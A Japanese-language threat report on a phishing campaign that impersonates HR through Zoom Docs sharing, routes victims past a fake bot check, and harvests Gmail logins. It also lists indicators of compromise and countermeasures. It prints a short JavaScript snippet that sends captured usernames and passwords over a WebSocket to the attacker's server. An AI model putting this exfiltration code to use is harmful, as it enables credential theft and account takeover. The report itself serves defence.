脅威の概要:人事部を装った巧妙なフィッシング
サイバー犯罪者が人事部を装い、一見正当なZoomドキュメント共有を悪用して、被害者からGmailのログイン情報を詐取する新たなフィッシング手口が確認されました。この攻撃では、偽のボット保護ゲートを介して被害者をGmailログインフィッシングページにリダイレクトし、ユーザーの認証情報はWebSocketを介してリアルタイムで流出し、即座に検証されます。
このレポートでは、ソーシャルエンジニアリングの手口、悪意のあるインフラストラクチャ、概念実証の認証情報流出コード、および監視すべき侵害の兆候について詳しく解説します。
求職者も従業員も、ドキュメント共有のためのZoom通知を信頼しています。最近の事例では、「HR application」というタイトルのメールが正当なZoom Docsのアドレスから届きました。SPF、DKIM、DMARCのすべてが検査を通過し、受信者を誤った安心感に誘い込みました。リンクは標準的なZoomドキュメントURLのように見えましたが、実際にはhxxps://overflow.qyrix[.]com.de/GAR @bBWe/を指しており、これは「Press & Hold to confirm」というボット保護ウィジェットをホストするサーバーでした。さらに深く調査すると、このドキュメントリンクは、古典的なGmail認証情報詐取ページにリダイレクトする外部ページにつながっていることが判明しました。
ゲートを通過すると、ユーザーはhxxps://overflow.qyrix[.]com.de/aoi99lxz7s0?id=02efd7fc7…にリダイレクトされ、そこにはGmailログインUIのレプリカが認証情報を待ち構えていました。この一連のプロセス全体が、Zoomの信頼されたプラットフォームを悪用し、クリック率を最大化し、初期の疑念を回避していました。
技術的分析:リアルタイムデータ窃取のメカニズム
フィッシングページはGmailのインターフェースを模倣しただけでなく、リアルタイムのデータ窃取のためにWebSocket接続を利用していました。認証情報が入力されると、以下のスニペットが攻撃者のコマンド&コントロールサーバーへのライブチャネルを確立します。
const ws = new WebSocket('wss://overflow.qyrix.com.de/ws');
ws.onopen = () => {
const payload = JSON.stringify({ user: username, pass: password });
ws.send(payload);
ws.close();
};キャプチャされたWebSocketフレームは、ユーザー名とパスワードの即時流出を確認しました。バックエンドでは、認証情報がGoogle認証APIに対して検証されており、静的なフィッシングページと比較してわずかな遅延があるのはこのためです。この二段階検証により、攻撃者は有効なログインと失敗したログインをその場で選別し、その後の悪用やアカウント乗っ取りを加速させることができます。
対策戦略:被害を防ぐための実践的アプローチ
この種のフィッシング攻撃から身を守るためには、以下の対策が不可欠です。
- URLの確認: zoom.us以外のドメインを指すZoom共有リンクはすべて疑わしいものとして扱うべきです。ログイン前に「Press & Hold」検証やクイズが存在することは、Googleの認証フローには不適切です。
- SOCアナリストの監視: SOCアナリストは、ブラウザからの予期せぬアウトバウンドWebSocket(ws://またはwss://)接続を監視する必要があります。メールゲートウェイでは、URL書き換えとドメイン評価チェックにより、hxxps://overflow.qyrix.com.deを悪意のあるものとしてフラグ付けできます。
- 認証情報漏洩時の対応: 認証情報が送信されてしまった場合、公式のGoogleサイトを介した即時パスワードリセットが必須であり、その後二要素認証を有効にする必要があります。
- メールヘッダーの検査: ユーザーは完全なメールヘッダーを検査し、Fromドメインがリンクドメインと一致していることを確認すべきです。
- 悪意のあるドメインのブロック: セキュリティチームは、DNSまたはプロキシレベルで悪意のあるドメインをブロックできます。
- 報告の実施: スクリーンショットとヘッダーを添えてZoomの不正利用報告ポータルとGoogleのフィッシング報告フォームに報告することは、テイクダウンの取り組みを支援します。
- パスワードマネージャーの活用: パスワードマネージャーの使用を奨励することは、オフドメインページでの認証情報の自動入力が拒否されるため、別の防御線を追加します。
結論として、Zoomのドキュメント共有機能はコラボレーションを強化しますが、巧妙なフィッシングキャンペーンの信頼された媒介として悪用される可能性があります。迅速なURLの健全性チェック、ヘッダー検査、および異常な検証手順への認識は、この悪意のある人事部のなりすましからあなたの受信トレイと認証情報を保護することができます。